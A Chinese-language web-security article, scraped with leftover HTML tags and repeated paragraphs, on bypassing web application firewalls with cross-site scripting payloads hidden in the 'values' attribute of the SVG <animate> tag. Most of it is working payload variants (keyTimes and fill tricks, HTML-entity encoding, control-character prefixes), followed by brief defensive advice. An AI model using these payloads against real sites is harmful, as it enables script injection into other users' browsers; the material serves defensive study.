SVG

<animate><\/code> 标签 XSS 利用技术详解<\/h1>
概述<\/h2>
本文详细解析了如何利用 SVG <animate><\/code> 标签的 values<\/code> 属性进行 XSS 攻击的技术。该技术通过巧妙利用 SVG 动画属性的特性，能够绕过许多 WAF (Web 应用防火墙) 的检测。<\/p>
基本原理<\/h2>
大多数 WAF 能够提取属性值并检测其中的恶意负载（如 javascript:alert(1)<\/code>）。然而，values<\/code> 属性可以包含多个用分号分隔的值，每个值都会被动画标签单独处理。通过在 values<\/code> 属性中间插入 JavaScript URL，可以误导 WAF：<\/p>
<animate<\/span> values<\/span>=<\/span>"http:\/\/safe-url\/?;javascript:alert(1);C"<\/span>>
<\/span><\/span><\/code><\/pre>基础攻击向量<\/h2>
一个完整的 XSS 攻击示例：<\/p>
<svg<\/span>>
<\/span><\/span>  <animate<\/span> xlink:href<\/span>=<\/span>#xss<\/span> attributeName<\/span>=<\/span>href<\/span> dur<\/span>=<\/span>5s<\/span> repeatCount<\/span>=<\/span>indefinite<\/span> 
<\/span><\/span>           keytimes<\/span>=<\/span>0;0;1<\/span> values<\/span>=<\/span>"https:\/\/safe-url?;javascript:alert(1);0"<\/span> \/>
<\/span><\/span>  <a<\/span> id<\/span>=<\/span>xss<\/span>><text<\/span> x<\/span>=<\/span>20<\/span> y<\/span>=<\/span>20<\/span>>XSS<\/text<\/span>><\/a<\/span>>
<\/span><\/span><\/svg<\/span>>
<\/span><\/span><\/code><\/pre>用户需要点击"XSS"文本来触发弹窗。<\/p>
技术优化<\/h2>
1. 缩短攻击载荷<\/h3>
通过理解 values<\/code> 和 keyTimes<\/code> 属性的关系，可以优化攻击载荷：<\/p>

keyTimes<\/code> 定义了何时使用 values<\/code> 中的对应值<\/li>
将第一个 keyTimes<\/code> 设为 0 可以忽略第一个 values<\/code> 值<\/li>
<\/ul>
优化后的载荷：<\/p>
<svg<\/span>>
<\/span><\/span>  <animate<\/span> xlink:href<\/span>=<\/span>#xss<\/span> attributeName<\/span>=<\/span>href<\/span> keyTimes<\/span>=<\/span>0;0;1<\/span> 
<\/span><\/span>           values<\/span>=<\/span>"http:\/\/isec.pl;javascript:alert(1);X"<\/span> \/>
<\/span><\/span>  <a<\/span> id<\/span>=<\/span>xss<\/span>><text<\/span> x<\/span>=<\/span>20<\/span> y<\/span>=<\/span>20<\/span>>XSS<\/text<\/span>><\/a<\/span>>
<\/span><\/span><\/svg<\/span>>
<\/span><\/span><\/code><\/pre>2. 替代 keyTimes<\/code> 属性<\/h3>
使用 fill<\/code> 属性可以达到类似效果：<\/p>

fill="remove"<\/code>: 动画结束后回到第一帧<\/li>
fill="freeze"<\/code>: 动画结束后保持最后一帧<\/li>
<\/ul>
利用 fill="freeze"<\/code> 并设置极短持续时间：<\/p>
<svg<\/span>>
<\/span><\/span>  <animate<\/span> xlink:href<\/span>=<\/span>#xss<\/span> attributeName<\/span>=<\/span>href<\/span> fill<\/span>=<\/span>freeze<\/span> dur<\/span>=<\/span>1ms<\/span> 
<\/span><\/span>           values<\/span>=<\/span>"http:\/\/isec.pl;javascript:alert(1)"<\/span> \/>
<\/span><\/span>  <a<\/span> id<\/span>=<\/span>xss<\/span>><text<\/span> x<\/span>=<\/span>20<\/span> y<\/span>=<\/span>20<\/span>>XSS<\/text<\/span>><\/a<\/span>>
<\/span><\/span><\/svg<\/span>>
<\/span><\/span><\/code><\/pre>3. HTML 编码绕过<\/h3>
对 values<\/code> 属性中的字符进行 HTML 编码可进一步绕过 WAF：<\/p>
<svg<\/span>>
<\/span><\/span>  <animate<\/span> xlink:href<\/span>=<\/span>#xss<\/span> attributeName<\/span>=<\/span>href<\/span> fill<\/span>=<\/span>freeze<\/span> dur<\/span>=<\/span>1ms<\/span> 
<\/span><\/span>           values<\/span>=<\/span>"http:\/\/isec.pl;j&#97;v&#x61;script:alert(1)"<\/span> \/>
<\/span><\/span>  <a<\/span> id<\/span>=<\/span>xss<\/span>><text<\/span> x<\/span>=<\/span>20<\/span> y<\/span>=<\/span>20<\/span>>XSS<\/text<\/span>><\/a<\/span>>
<\/span><\/span><\/svg<\/span>>
<\/span><\/span><\/code><\/pre>还可以在 javascript:<\/code> 前插入 ASCII 1-32 的控制字符：<\/p>
<svg<\/span>>
<\/span><\/span>  <animate<\/span> xlink:href<\/span>=<\/span>#xss<\/span> attributeName<\/span>=<\/span>href<\/span> 
<\/span><\/span>           values<\/span>=<\/span>"&#11;javascript:alert(1)"<\/span> \/>
<\/span><\/span>  <a<\/span> id<\/span>=<\/span>xss<\/span>><text<\/span> x<\/span>=<\/span>20<\/span> y<\/span>=<\/span>20<\/span>>XSS<\/text<\/span>><\/a<\/span>>
<\/span><\/span><\/svg<\/span>>
<\/span><\/span><\/code><\/pre>或使用多个控制字符：<\/p>
<svg<\/span>>
<\/span><\/span>  <animate<\/span> xlink:href<\/span>=<\/span>#xss<\/span> attributeName<\/span>=<\/span>href<\/span> 
<\/span><\/span>           values<\/span>=<\/span>"&#01;&#02;...&#32;javascript:alert(1)"<\/span> \/>
<\/span><\/span>  <a<\/span> id<\/span>=<\/span>xss<\/span>><text<\/span> x<\/span>=<\/span>20<\/span> y<\/span>=<\/span>20<\/span>>XSS<\/text<\/span>><\/a<\/span>>
<\/span><\/span><\/svg<\/span>>
<\/span><\/span><\/code><\/pre>防御建议<\/h2>

对所有用户提供的 SVG 内容进行严格过滤<\/li>
禁用或严格限制 javascript:<\/code> 协议的使用<\/li>
实施内容安全策略 (CSP)<\/li>
对 SVG 文件进行服务器端渲染检查<\/li>
使用专门的 SVG 解析库而非简单的正则表达式检测<\/li>
<\/ol>
总结<\/h2>
SVG 规范中隐藏了许多潜在的 XSS 攻击媒介，即使是简单的属性值也可能包含多个恶意负载。本文介绍的技术已在 Firefox 和 Chrome 浏览器上测试有效。防御这类攻击需要深入理解 SVG 规范和多层次的防护措施。<\/p>

概述<\/h2> 本文详细解析了如何利用 SVG <animate><\/code> 标签的 values<\/code> 属性进行 XSS 攻击的技术。该技术通过巧妙利用 SVG 动画属性的特性，能够绕过许多 WAF (Web 应用防火墙) 的检测。<\/p>

技术优化<\/h2>

总结<\/h2> SVG 规范中隐藏了许多潜在的 XSS 攻击媒介，即使是简单的属性值也可能包含多个恶意负载。本文介绍的技术已在 Firefox 和 Chrome 浏览器上测试有效。防御这类攻击需要深入理解 SVG 规范和多层次的防护措施。<\/p>

概述<\/h2>
本文详细解析了如何利用 SVG `<animate><\/code> 标签的 values<\/code> 属性进行 XSS 攻击的技术。该技术通过巧妙利用 SVG 动画属性的特性，能够绕过许多 WAF (Web 应用防火墙) 的检测。<\/p>`

总结<\/h2>
SVG 规范中隐藏了许多潜在的 XSS 攻击媒介，即使是简单的属性值也可能包含多个恶意负载。本文介绍的技术已在 Firefox 和 Chrome 浏览器上测试有效。防御这类攻击需要深入理解 SVG 规范和多层次的防护措施。<\/p>